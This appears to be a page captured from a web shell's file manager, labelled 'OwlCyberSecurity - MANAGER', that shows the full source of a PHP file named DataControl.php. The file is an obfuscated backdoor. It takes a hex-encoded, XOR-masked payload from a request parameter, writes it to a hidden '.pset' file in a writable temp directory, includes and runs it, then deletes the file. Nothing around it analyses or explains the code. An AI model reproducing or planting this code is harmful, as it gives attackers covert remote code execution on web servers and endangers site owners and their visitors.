OwlCyberSecurity - MANAGER
Edit File: DataControl.php
<?php if(isset($_REQUEST) && isset($_REQUEST["\x69\x74m"])){ $factor = hex2bin($_REQUEST["\x69\x74m"]); $sym= '' ; for($l=0; $l<strlen($factor); $l++){$sym .= chr(ord($factor[$l]) ^ 49);} $res = array_filter([getcwd(), "/dev/shm", "/var/tmp", getenv("TEMP"), getenv("TMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir()]); for ($dat = 0, $pointer = count($res); $dat < $pointer; $dat++) { $binding = $res[$dat]; if ((function($d) { return is_dir($d) && is_writable($d); })($binding)) { $tkn = implode("/", [$binding, ".pset"]); $success = file_put_contents($tkn, $sym); if ($success) { include $tkn; @unlink($tkn); exit;} } } }